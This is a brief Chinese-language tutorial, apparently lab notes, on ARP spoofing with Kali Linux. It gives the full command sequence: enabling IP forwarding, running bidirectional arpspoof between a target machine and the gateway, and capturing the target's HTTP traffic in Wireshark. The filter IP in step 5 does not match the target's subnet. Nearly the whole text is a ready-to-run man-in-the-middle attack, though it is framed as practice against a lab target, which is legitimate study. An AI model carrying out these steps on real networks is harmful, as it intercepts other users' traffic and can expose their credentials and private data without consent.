kali冒充路由器开启ARP局域网欺骗

原理：kali冒充网关，欺骗局域网中任何一台靶机，让这台靶机把所有应该发往网管的数据流量发到kali系统，完成捕获分析
实战：
1.路由器转发

echo 1 > /proc/sys/net/ipv4/ip_forward \提示权限不够时输入 echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

2.欺骗设置（双向欺骗）
终端端一：

arpspoof -i eth0 -t 192.168.1.129（目标靶机） 192.168.1.1（网关）

终端二：

arpspoof -i eth0 -t 192.168.1.1（网关） 192.168.1.129（目标靶机）

3.终端三：

sudo wireshark

注：
开启kali的抓包工具wireshark(捕捉靶机发往外网的所有数据包）

4.模拟上网
靶机上网，如访问图片

5.wireshark过滤输入筛选数据

ip.addr==192.168.31.16 and http

6.捕捉数据，分析数据